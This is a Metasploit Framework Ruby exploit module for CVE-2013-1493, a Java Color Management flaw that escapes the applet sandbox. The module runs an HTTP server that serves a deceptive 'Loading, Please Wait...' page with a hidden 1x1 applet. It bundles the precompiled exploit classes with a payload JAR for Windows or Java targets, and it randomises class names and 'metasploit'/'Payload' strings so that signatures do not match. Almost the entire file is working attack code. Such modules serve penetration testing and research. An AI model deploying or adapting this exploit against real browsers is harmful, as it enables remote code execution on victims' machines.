##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
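# Framework core and the Rex support library; both lines were corrupted with
# stray characters and typographic quotes in the listing, which Ruby cannot parse.
require 'msf/core'
require 'rex'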
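# Browser exploit module for CVE-2013-1493 (Java CMM / Color Management).
#
# The module runs an HTTP server that serves a small HTML page embedding an
# applet. The applet's class files are shipped precompiled under
# data/exploits/cve-2013-1493 and are packed, together with the payload JAR,
# into a single archive at request time. Class names and well-known strings
# inside the archive are randomised on every request.
#
# Listing repairs relative to the corrupted copy: interleaved noise characters
# and typographic quotes removed, the displaced 'DefaultTarget' key moved back
# into the info hash, and a duplicated trailing 'end' dropped.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # The landing page needs no JavaScript, so autopwn may skip JS fingerprinting.
  autopwn_info({ :javascript => false })

  # Module metadata: targets, references and payload constraints.
  #
  # @param info [Hash] module info supplied by the framework
  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      # Index into 'Targets' above: the native Windows x86 target.
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four precompiled applet classes from the module's data directory,
  # randomises the name of the entry-point class, then continues with the
  # mixin setup chain.
  #
  # @raise [Errno::ENOENT] if one of the .class resources is missing
  def setup
    @init_class           = load_class_file("Init.class")
    @leak_class           = load_class_file("Leak.class")
    @buffered_image_class = load_class_file("MyBufferedImage.class")
    @color_space_class    = load_class_file("MyColorSpace.class")

    # The entry-point class is served under a random name, so the literal
    # "Init" inside its class file is rewritten to match. The replacement has
    # the same length as the original, so the file size does not change.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # HTTP request dispatcher.
  #
  # * URIs ending in .jar receive the payload JAR extended with the applet
  #   classes, with "metasploit"/"Payload" markers randomised in entry names
  #   and contents.
  # * URIs ending in "/" receive the applet landing page (after the payload has
  #   been regenerated for this client).
  # * Anything else is redirected to the resource root.
  #
  # @param cli [Object] client connection handed over by the HTTP server mixin
  # @param request [Object] parsed request; only +uri+ is read here
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Same-length random replacements keep the archive layout stable.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str    = rand_text_alpha("payload".length)

      jar.entries.each do |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      end
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      unless payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end

      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Builds the landing page: a 1x1 applet tag pointing at a randomly named
  # .jar and at the randomised entry-point class chosen in #setup.
  #
  # @return [String] complete HTML document
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    html
  end

  private

  # Reads one precompiled applet class from data/exploits/cve-2013-1493.
  #
  # @param name [String] file name of the .class resource
  # @return [String] raw bytes of the file
  # @raise [Errno::ENOENT] if the resource is missing from the install
  def load_class_file(name)
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", name)
    File.binread(path)
  end
end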